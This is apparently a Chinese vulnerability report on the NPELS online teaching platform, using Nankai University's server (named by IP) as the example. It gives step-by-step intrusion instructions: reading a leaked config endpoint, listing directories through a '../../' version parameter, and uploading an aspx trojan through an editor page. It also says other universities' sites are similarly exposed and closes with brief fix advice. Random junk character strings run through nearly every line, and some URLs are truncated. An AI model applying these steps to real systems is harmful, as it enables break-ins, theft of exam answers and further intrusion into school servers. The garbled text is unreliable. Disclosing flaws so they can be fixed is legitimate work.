好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
7 r, y v- }" p- m: u! B' l0 }7 w) K% h. ` ]& z
详细说明:9 I( i' ~1 u f6 ^, t4 f
) Y" H" M A8 n2 q* n% S
以南开大学的为例:
: U! G7 z ]( z% k4 t; Khttp://222.30.60.3/NPELS
; w! q' V' m! {% {9 l2 \8 WNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址, C- p0 |6 s- y) L) |3 F
<setting name="Update_CommonSvr_CommonService" serializeAs="String">6 A; h! I" o+ T5 p+ _3 L
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>* W# N/ U- C, O8 I9 a. x, u) B6 Q( N( C
</setting>
) u6 @- i" N2 B7 u! s及版本号% G* C/ U5 k) T- [* ~: L+ `5 y7 l
<add key="TVersion" value="1, 0, 0, 2187">% \' f/ {& V: d; L4 @
</add>4 |: E9 x8 ]' y
直接访问
' s3 S+ u- F! D3 nhttp://222.30.60.3/NPELS/CommonService.asmx
7 Y" u9 M* G8 w. b) y使用GetTestClientFileList操作,直接 HTTP GET 列目录:- |+ V' p- S9 s( ?1 n0 V
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187) k* N; r: [5 a' r0 b4 f
进一步列目录(返回的网页很大,可以直接 wget 下来)
8 z1 \8 N# R7 L2 mhttp://222.30.60.3/NPELS/CommonS ... List?version=../../' e6 z. O7 X& F0 u" m
' T6 p5 M% V+ l s
发现 D0 v/ B. u5 M. Z# }. ]. @- m1 [/ U
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm# D9 K8 q# R$ T% b1 ^: U
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
) H \- Z: V2 J" f上传后继续列目录找到木马地址直接访问即可- C% u. b8 R2 K, U
+ N6 c4 r3 J' g. A! yOOXX! k% n2 A- E |5 N
* S- T3 ?/ n( i7 JGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法# P0 _% X: b1 U) {& N
漏洞证明:
* g) T" n3 t, `& U, e
) v' R( H0 F) V列目录:
4 P4 u" u b- l# Zhttp://222.30.60.3/NPELS/CommonS ... List?version=../../. E3 M# Y" j5 ]; m) S
文件上传:
7 ~. n' G9 B' k( R* D3 Nhttp://222.30.60.3/npelsv/editor/editor.htm. E) U/ g5 I& p0 R) d
1 b" ]7 R; u; J) @+ p1 h上传木马:* @5 [0 M8 z# E: t
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
$ A8 V+ k3 Q A4 ]0 M) t( t$ [8 o3 e `( D+ ~5 k; X" z5 j! D9 s
修复方案:( O% g& U7 ?/ ]8 B7 J# x0 I) G
好像考试系统必须使用 CommonService.asmx8 | F7 O$ z6 v+ Q/ a5 `
最好配置文件加密或者用别的方式不让它泄露出来
5 a7 ~% e% ^6 R' p; Q5 {并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
- O+ E) s- x8 M8 p |